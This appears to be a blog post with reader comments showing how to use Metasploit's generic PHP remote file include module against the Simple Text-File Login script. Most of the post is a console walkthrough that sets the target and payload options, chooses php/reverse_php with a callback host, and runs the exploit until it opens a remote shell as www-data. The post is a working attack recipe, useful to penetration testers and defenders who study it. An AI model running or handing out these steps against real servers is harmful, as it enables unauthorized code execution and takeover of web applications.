Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:
/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]and make your PHPURI
PHPURI /slogin_lib.inc.php?slogin_path=XXpathXXlet's see it in action
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========
Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit
msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Space: 32768
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010
dir
0.jpeg header.inc.php license.txt slog_users.txt version.txt
1.jpeg index.asp old slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php
id uid=33(www-data) gid=33(www-data) groups=33(www-data)
3 comments:
Knew there was a nicer way to do that then going through the pain of manually generating the exploit, throwing it on a server, and starting the payload handler, but I couldn't remember where it was at. That had been bothering me. Thanks!
I didn't see anything in the options for setting cookies so looks like this is for unauthenticated vectors only.
I hope this gets added.
good point. submit a ticket on msf site and im sure it will get added.
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